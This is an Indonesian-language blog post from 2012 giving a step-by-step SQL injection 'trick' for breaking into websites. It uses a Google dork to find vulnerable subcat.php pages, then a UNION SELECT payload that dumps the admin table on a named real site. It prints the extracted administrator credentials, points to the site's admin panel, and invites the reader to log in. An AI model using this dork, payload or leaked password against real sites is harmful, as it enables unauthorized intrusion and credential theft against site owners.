Tuesday, February 28, 2012

Trick SQL Injection melalui Script.

Sebuah trik untuk masuk ke keamanan suatu web yaitu dengan cara membobol password administrator langsung aja buka google-nya ...
masukkan keyword ini inurl:/subcat.php?cate_id=
dari sekian banyak hasil pencarian silahkan pilih salah satu contoh :

http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096
setelah cate_id= di hapus saja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas

sword),2%20from%20admin/*&view=list

hasilnya menjadi seperti dibawah ini :

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11

7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

Password langsung keluar kan..?
turkey:adminturkeypass:daniel87

itu artinya
usernamenya admin
passwordnya daniel87

sekarang masuk ke control panelnya

http://www.estoop.it/admin
terus masukkin username dan passwordnya

silahkan nikmati hasilnya :D

No comments:

Post a Comment